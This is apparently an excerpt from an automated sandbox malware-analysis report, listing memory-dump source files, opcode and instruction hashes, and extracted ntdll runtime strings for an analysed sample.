                                                                                                                      • Instruction ID: 806b098c3655b39e4bd1809cd46a366d0b1525bd400fbb67e0f8895a01c99fa2
                                                                                                                      • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                                      • Instruction Fuzzy Hash: 22D0123321607197DF29566A7A14F677919AB81A98F1A006D750A93944C5158C42D6E0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                                                                      • Instruction ID: bf16f9e8c974a67174154fae910c2d725d4d6b0c40653ba9159a9eed5c2a703b
                                                                                                                      • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                                                                      • Instruction Fuzzy Hash: 52D012371D054DBBCF119F66DC01F957BA9E764BA0F454020B604875A0C63AE950D584
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 3ef6e55c246dcdfdb510b9b4cc84bf6a65c8a6cc6dd25e0d98a87491a76da5d2
                                                                                                                      • Instruction ID: aab3cc93b5487f29796c7f5b2a991a0a87ddd4695479a80e7c1d172330e8b6ee
                                                                                                                      • Opcode Fuzzy Hash: 3ef6e55c246dcdfdb510b9b4cc84bf6a65c8a6cc6dd25e0d98a87491a76da5d2
                                                                                                                      • Instruction Fuzzy Hash: F0D05E315450128BDF17CB09CA50A2A3A70EB10680B40007DEF4051131E334D801C640
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                                                      • Instruction ID: 356fb880bb2cfd9e34d17d6dab285438a5f7f0fb87251c5c253fd07446410fcb
                                                                                                                      • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                                                      • Instruction Fuzzy Hash: 71D0C939252E80DFD61BCB0CC5A4B1533A4FB44B48F850494F501CBB22D63CD940CA10
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                                      • Instruction ID: e5ceeee814a52028009be4ebec16219588ae169734372387a4955d2d5ae858b9
                                                                                                                      • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                                      • Instruction Fuzzy Hash: 62C08C33290648AFCB12EF99CD01F027BA9FBA8B40F010021F3048B670C631FC20EA84
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                                      • Instruction ID: 86d4db5a411716b968711ac5c449076424fc4c23d27106d7bdcb0c8601ee26e3
                                                                                                                      • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                                      • Instruction Fuzzy Hash: DED01236100248EFCB02DF42C890E9A772AFBD8750F108019FD1907650CA31ED62DA50
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 277bf209df5b929001af084e4e87e940e3e49364ec2e84031f1a089b6684ad07
                                                                                                                      • Instruction ID: f6b0068d1d21a6257adc93bfdb38f34f392cee78a606adcb7d033b8b9bcc3d6f
                                                                                                                      • Opcode Fuzzy Hash: 277bf209df5b929001af084e4e87e940e3e49364ec2e84031f1a089b6684ad07
                                                                                                                      • Instruction Fuzzy Hash: 2590023120140503D10071585508707401597E4201F55D512B0428559DD76689527221
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 32e3652c21a832156df7b506760dd04efa3e082ddd0ea39533ca92537fe86495
                                                                                                                      • Instruction ID: bbc8e781e6cb4b576c3e8d1c3ef081826752c5f73cf8a2c267f23673c6747192
                                                                                                                      • Opcode Fuzzy Hash: 32e3652c21a832156df7b506760dd04efa3e082ddd0ea39533ca92537fe86495
                                                                                                                      • Instruction Fuzzy Hash: 9790023120140502D10075985408646401597F4301F55D112B5028556EC77589927231
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 186ea5e07f67ddf3c07037f16f32081d37ab059250abee0c0e528db2209e6de4
                                                                                                                      • Instruction ID: 820b671acecfd011f1c5ac23b3acc377d4c415500511d729e2b9691976424eec
                                                                                                                      • Opcode Fuzzy Hash: 186ea5e07f67ddf3c07037f16f32081d37ab059250abee0c0e528db2209e6de4
                                                                                                                      • Instruction Fuzzy Hash: E190026121140142D10471584404706405597F5201F55C113B2158555CC6398D626225
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 515cd9ee8ada5ed775fdc6acb9e8331828354912b3554e4539a5023e95ec3e9e
                                                                                                                      • Instruction ID: f7aba6bd0560446a9f1c66a07b210730e3d614da4ce5c149d701731df7636654
                                                                                                                      • Opcode Fuzzy Hash: 515cd9ee8ada5ed775fdc6acb9e8331828354912b3554e4539a5023e95ec3e9e
                                                                                                                      • Instruction Fuzzy Hash: E890026134140542D10071584414B064015D7F5301F55C116F1068555DC729CD537226
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 226f09f5fc327503db36625010d8cf21414250cada93c93aa046d192c7a7a7e9
                                                                                                                      • Instruction ID: c6c2d6975c72699ade5eb485eb3d8598e2ed1ecf2e693bfd48f5235e237dee49
                                                                                                                      • Opcode Fuzzy Hash: 226f09f5fc327503db36625010d8cf21414250cada93c93aa046d192c7a7a7e9
                                                                                                                      • Instruction Fuzzy Hash: 12900221211C0142D20075684C14B07401597E4303F55C216B0158555CCA2589626621
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 6888c6e66454395aacec729ac6ef879c6c0cd3f2ea9eb97abe9ccb3544afd1ae
                                                                                                                      • Instruction ID: 28a054cdcb48084097455531bcc7b0defdb56be1e7ff7186cf54e0e7b7371423
                                                                                                                      • Opcode Fuzzy Hash: 6888c6e66454395aacec729ac6ef879c6c0cd3f2ea9eb97abe9ccb3544afd1ae
                                                                                                                      • Instruction Fuzzy Hash: 2790023120180502D1007158481470B401597E4302F55C112B1168556DC73589527671
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: ce0f90b6a0d44d79c21b83fea41bfb88aac4da992c76673197aa0718e918e12e
                                                                                                                      • Instruction ID: 010f7cc22174375095b5a63a8e4468ed744e95c98ab27a1ba9171ec38c91df99
                                                                                                                      • Opcode Fuzzy Hash: ce0f90b6a0d44d79c21b83fea41bfb88aac4da992c76673197aa0718e918e12e
                                                                                                                      • Instruction Fuzzy Hash: 4D90023120180502D10071584808747401597E4302F55C112B5168556EC775C9927631
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: beff5565d886e36f48d22d736d623f1d867baca248355a32afc36cce66b8e394
                                                                                                                      • Instruction ID: 6be5f6d47bd6d544238e3f6151a2c1d9f8efe7cb075e9936e449a8d94af1e5d6
                                                                                                                      • Opcode Fuzzy Hash: beff5565d886e36f48d22d736d623f1d867baca248355a32afc36cce66b8e394
                                                                                                                      • Instruction Fuzzy Hash: 7C900221601401424140716888449068015BBF5211755C222B099C551DC66989666765
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 73bd64d2473eaa49720f2f1184a7bf4439d0aeff9810945b491164267a77b7c0
                                                                                                                      • Instruction ID: 3ee456e562620cea4b3ec44d65ed705f059f12bdcc5da6a98424762c95a7616b
                                                                                                                      • Opcode Fuzzy Hash: 73bd64d2473eaa49720f2f1184a7bf4439d0aeff9810945b491164267a77b7c0
                                                                                                                      • Instruction Fuzzy Hash: 6090022130140502D102715844146064019D7E5345F95C113F1428556DC7358A53B232
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: d4d559d7e5ca81d47296f8ea113ebc8c1b5d428e851aa483840964e8ce5e0518
                                                                                                                      • Instruction ID: d10510971852c9e3f1b249b77a6e8535aebcef900deb677c891aa6b0a6141ee1
                                                                                                                      • Opcode Fuzzy Hash: d4d559d7e5ca81d47296f8ea113ebc8c1b5d428e851aa483840964e8ce5e0518
                                                                                                                      • Instruction Fuzzy Hash: BF90026120180503D14075584804607401597E4302F55C112B2068556ECB398D527235
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: e1534b9766bfabd94be1d283f3e420e6c5aa21386f0c6eb33c2c0e6b80e5f79a
                                                                                                                      • Instruction ID: 5589c26c9f86f35682cd484d774b9917f41f0f339c0b729193588e4b2e1ce48f
                                                                                                                      • Opcode Fuzzy Hash: e1534b9766bfabd94be1d283f3e420e6c5aa21386f0c6eb33c2c0e6b80e5f79a
                                                                                                                      • Instruction Fuzzy Hash: 2490022160140602D10171584404616401A97E4241F95C123B1028556ECB358A93B231
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 1627a171c7c4793c9d990c5c19e6879771660bf516d9093d6eb0b599bdddb350
                                                                                                                      • Instruction ID: c004b1b69302282d93350b26fdf726ff563353ae97732dba2912cae1bfc272f6
                                                                                                                      • Opcode Fuzzy Hash: 1627a171c7c4793c9d990c5c19e6879771660bf516d9093d6eb0b599bdddb350
                                                                                                                      • Instruction Fuzzy Hash: A590027120140502D14071584404746401597E4301F55C112B5068555EC7698ED67765
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 0b93f297e3e2f50e05a51cb03ccaac2c37ec791f98cd17bae823045b6304c202
                                                                                                                      • Instruction ID: bb4316d7e9bbcc17efa0a3d6f1de1a511839f4d4abe3c0a64946b92c046365f7
                                                                                                                      • Opcode Fuzzy Hash: 0b93f297e3e2f50e05a51cb03ccaac2c37ec791f98cd17bae823045b6304c202
                                                                                                                      • Instruction Fuzzy Hash: FC90022120184542D14072584804B0F811597F5202F95C11AB415A555CCA2589566721
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 81088192d17dbd2a28913638a4dc94a4ba718549483ddf317ba38a4a77528030
• Instruction ID: c06d983edff15eb4694ff6f5b5e335fd7e00b7e6f7a4af2a4ecee0278edafecc
• Opcode Fuzzy Hash: 81088192d17dbd2a28913638a4dc94a4ba718549483ddf317ba38a4a77528030
• Instruction Fuzzy Hash: 7890022124140902D140715884147074016D7E4601F55C112B0028555DC7268A6677B1

Memory Dump Source
• Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 461afdbc4b41a01b2b2e5a79729a26c66f3b2e47d232fa8cdd068366ebc4432b
• Instruction ID: 70fc9774b09544175c8f2e89473503c7ba5a698138147fd969ba10e457e8ee65
• Opcode Fuzzy Hash: 461afdbc4b41a01b2b2e5a79729a26c66f3b2e47d232fa8cdd068366ebc4432b
• Instruction Fuzzy Hash: 7190022124545202D150715C44046168015B7F4201F55C122B0818595DC66589567321

Memory Dump Source
• Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0aa3a1111b8f87e776a8be963696618dbcb66972c8d0be9bf6a1c970a77b8ab6
• Instruction ID: b7d177fb80ad9f0cce620e4d2c7afdf9b4ed8dafc4caa90f0296daa2b775bec0
• Opcode Fuzzy Hash: 0aa3a1111b8f87e776a8be963696618dbcb66972c8d0be9bf6a1c970a77b8ab6
• Instruction Fuzzy Hash: 4E90023520140502D51071585804646405697E4301F55D512B0428559DC76489A2B221

Memory Dump Source
• Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e609000879f14c1d875a8ba344880db99ee9ed3e9ad897fc98caf8af794755d0
• Instruction ID: 8151441d0d5afaad8e7c87d694ca9d6167130c5449e87cf0441e26282bb81bb7
• Opcode Fuzzy Hash: e609000879f14c1d875a8ba344880db99ee9ed3e9ad897fc98caf8af794755d0
• Instruction Fuzzy Hash: 0990023120240242954072585804A4E811597F5302B95D516B0019555CCA2489626321

Memory Dump Source
• Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
• Instruction ID: 979be13648effb931f065e19da141a5d03dbee761b8e7a568487bec3bf28b0a2
• Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
• Instruction Fuzzy Hash:

APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
Similarity
• API ID: ___swprintf_l
• String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
• API String ID: 48624451-2108815105
• Opcode ID: bfe7ed5e5f83dd8b8794a0a99e09f89fafac69ea686b069dc8ba205f7e7047a7
• Instruction ID: 41d0ff9fe66695e44b2edc8830113776610df93d09c97837273899713b579d37
• Opcode Fuzzy Hash: bfe7ed5e5f83dd8b8794a0a99e09f89fafac69ea686b069dc8ba205f7e7047a7
• Instruction Fuzzy Hash: 2951E7B2B001266FCB21DB9D8880D7FFBB8BB49244794822BF555D7752D3B4DE408BA0

APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
Similarity
• API ID: ___swprintf_l
• String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
• API String ID: 48624451-2108815105
• Opcode ID: a9f1509a1c7f2991646875c40ca5e1bc0575344ded0a5853ad5c8cbdbe0371ab
• Instruction ID: ceeb45a59c8f00879b502ef51e8b4954bfd7c850f1537c6d03124f27757cb24b
• Opcode Fuzzy Hash: a9f1509a1c7f2991646875c40ca5e1bc0575344ded0a5853ad5c8cbdbe0371ab
• Instruction Fuzzy Hash: 8851E4B5A00645BFCF20DE9DC990D7FBFB8AB48204B04846FE596D7792E6B4DA008760

Strings
• CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01454725
• CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 014546FC
• CLIENT(ntdll): Processing section info %ws..., xrefs: 01454787
• CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01454742
• ExecuteOptions, xrefs: 014546A0
• Execute=1, xrefs: 01454713
• CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01454655
Memory Dump Source
• Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
Similarity
• API ID:
• String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
• API String ID: 0-484625025
• Opcode ID: 0f8733e55a61858505011a77170340b99865de0471c335688fc05fcb437a98f8
• Instruction ID: 6075f36b986e737bceeb5581a37f86dada096b8e536bf61eb58d3d8429467c97
• Opcode Fuzzy Hash: 0f8733e55a61858505011a77170340b99865de0471c335688fc05fcb437a98f8
• Instruction Fuzzy Hash: 9A516E3160021ABAEF10ABA9EC95FBE77A8EF14715F04049FD509A72B1EB709E458F50

Memory Dump Source
• Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
• Instruction ID: 927ebe366d2ff26bac203d02096a2f9a75055a40fda8222d06c3517b20a8938d
• Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
• Instruction Fuzzy Hash: 38022571508342AFD705CF19C490AAFBBE5EFD8710F41892EFA894B264DB31E945CB62

APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
Similarity
• API ID: __aulldvrm
• String ID: +$-$0$0
• API String ID: 1302938615-699404926
• Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
• Instruction ID: e7ab0a6ee1ad5f8f85b2224bea3a03d0f928fcaf4b9023cc5a056e561a8beca7
• Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
• Instruction Fuzzy Hash: 4881C130E052698EEF258E6CC8507FEBBB1EF85320F98415BD865A73A1C77488C1CB52

APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
Similarity
• API ID: ___swprintf_l
• String ID: %%%u$[$]:%u
• API String ID: 48624451-2819853543
• Opcode ID: 9e52dcc75b3dd8f74c23e6053931db70cbd6bc4382ae73f6e0a8eeb024dc4775
• Instruction ID: 7efd964a9fbec818e44138362cfd6ddde2f4537119b09494e8531bb78393c449
• Opcode Fuzzy Hash: 9e52dcc75b3dd8f74c23e6053931db70cbd6bc4382ae73f6e0a8eeb024dc4775
• Instruction Fuzzy Hash: CC2153BAA00119ABDB10DF69D841EAFBFF8EF58654F45011BE905D3214E770D9118BA1

Strings
• RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 014502BD
• RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 014502E7
• RTL: Re-Waiting, xrefs: 0145031E
Memory Dump Source
• Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
Similarity
• API ID:
• String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
• API String ID: 0-2474120054
• Opcode ID: f9d555e8d86369ca556d0437d2eb533fbd8fbe492756b483c89979f58ad69a9b
• Instruction ID: 25f766ff5fa29ab00c18cdf0bec653ed9ae48002389cc119f9cebf5d5e086930
• Opcode Fuzzy Hash: f9d555e8d86369ca556d0437d2eb533fbd8fbe492756b483c89979f58ad69a9b
• Instruction Fuzzy Hash: 75E19E356047419FD726CF29C884B2ABBE0BB84314F140A6EF9958B3F2D775D94ACB42

Strings
• RTL: Resource at %p, xrefs: 01457B8E
• RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01457B7F
• RTL: Re-Waiting, xrefs: 01457BAC
Memory Dump Source
• Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
Similarity
• API ID:
• String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
• API String ID: 0-871070163
• Opcode ID: 303af6dd3cf8994dcc7c7a41563326f2a9cad2c3d44aada3b0f4487d1fa3f038
• Instruction ID: 82409cb1f453da9dba0228029d00047a37d1f189b6ba6e6b2ec3bf56036d8556
• Opcode Fuzzy Hash: 303af6dd3cf8994dcc7c7a41563326f2a9cad2c3d44aada3b0f4487d1fa3f038
• Instruction Fuzzy Hash: 2D41E4317007029FD720CE2AD850B6BB7E5EF98725F100A2EF956DB7A1DB71E8058B91

APIs
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0145728C
Strings
• RTL: Resource at %p, xrefs: 014572A3
• RTL: Re-Waiting, xrefs: 014572C1
• RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01457294
Memory Dump Source
• Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
Similarity
• API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
• String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
• API String ID: 885266447-605551621
• Opcode ID: 861e3b1bfda604aac3435d225d7b3c84582cee0418e2fa1f011e7b6222065e21
• Instruction ID: ca3ebb3c647a6a9d02252877bf61e769ea36804eec73d08108d3bde2a832e3f5
